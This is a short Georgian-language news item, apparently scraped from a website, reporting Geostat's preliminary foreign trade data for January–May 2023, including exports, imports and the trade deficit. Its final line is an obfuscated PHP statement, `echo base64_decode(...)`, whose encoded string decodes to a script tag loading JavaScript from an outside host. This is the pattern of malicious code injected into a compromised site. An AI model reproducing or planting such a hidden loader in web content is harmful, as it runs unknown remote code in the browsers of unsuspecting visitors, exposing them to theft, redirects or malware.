celsiusi
ავერსი საქკაბელი

საქსტატმა 2023 წლის მაისის საგარეო ვაჭრობის წინასწარი ანგარიში გამოაქვეყნა. დოკუმენტის თანახმად, მხოლოდ მაისში საქართველოდან 538 მილიონი დოლარის ღირებულების საქონლის ექსპორტი განხორციელდა, რაც წინა წელთან შედარებით 3%-ით, ანუ 15.8 მილიონი დოლარით მეტია.

2023 წლის 5 თვეში საქართველოს მთლიანი ექსპორტი 2.5 მილიარდი დოლარი იყო, რაც წინა წელთან შედარებით 18.5%-ით მეტია.

რაც შეეხება იმპორტს, მაისში საქართველომ 1.19 მილიარდი დოლარის საქონელი შეიძინა, რაც წინა წელთან შედარებით 1.3%-ით მეტი იყო. მთლიანად იანვარ-მაისში კი საქართველოს იმპორტი 5.85 მილიარდი დოლარი იყო, რაც წლიურად 19%-ით არის გაზრდილი.

უარყოფითმა სავაჭრო ბალანსმა 2023 წლის იანვარ-მაისში 3 359.4 მლნ. აშშ დოლარი შეადგინა, რაც საგარეო სავაჭრო ბრუნვის 40.2 პროცენტია. 

291
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");